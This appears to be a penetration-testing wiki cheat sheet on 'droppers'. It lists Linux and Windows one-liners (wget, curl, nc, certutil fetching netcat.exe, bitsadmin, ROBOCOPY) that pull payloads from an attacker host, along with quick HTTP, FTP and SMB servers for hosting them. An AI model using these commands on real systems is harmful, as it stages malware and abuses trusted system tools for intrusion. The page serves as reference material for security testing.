Droppers
From pentestwiki.org
Classic methods
Linux
$wget http://$IP/file$curl -k https://$IP/file > file$nc -nvv $IP 8080 > file$scp $FILE [email protected]$IP:~
Windows
Powershell
PS>curl -Uri $URL
See also Powercat
VBscript
ROBOCOPY
C:>NET USE \\$IP\IPC$ /USER:DOMAIN\USER
C:>ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
C:>NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
- Direct Transfer:
C:>bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
- Using a download queue:
C:>bitsadmin /create myDownloadJob
C:>bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil
C:>certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
C:>notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
- https://github.com/LOLBAS-Project/LOLBAS
- https://lolbas-project.github.io/
- https://gtfobins.github.io/
- https://github.com/Arno0x/CSharpScripts
- https://gist.github.com/jstangroome/9adaa87a845e5be906c8
- https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Examples:
C:>hh.exe C:\windows\system32\calc.exeC# compiler built-in command:
C:>csc.exe
Using known protocols
HTTP
- Python2
$python -m SimpleHTTPServerroot #python -m SimpleHTTPServer 80
- Python3
$python3 -m http.server 8080
- Php
$php -S localhost:8000
- Ruby
$ruby -run -e httpd . -p 8000
FTP
root #pip install pyftpdlibroot #python -m pyftpdlib
SMB
root #impacket-smbserver PAYLOADS /root/payload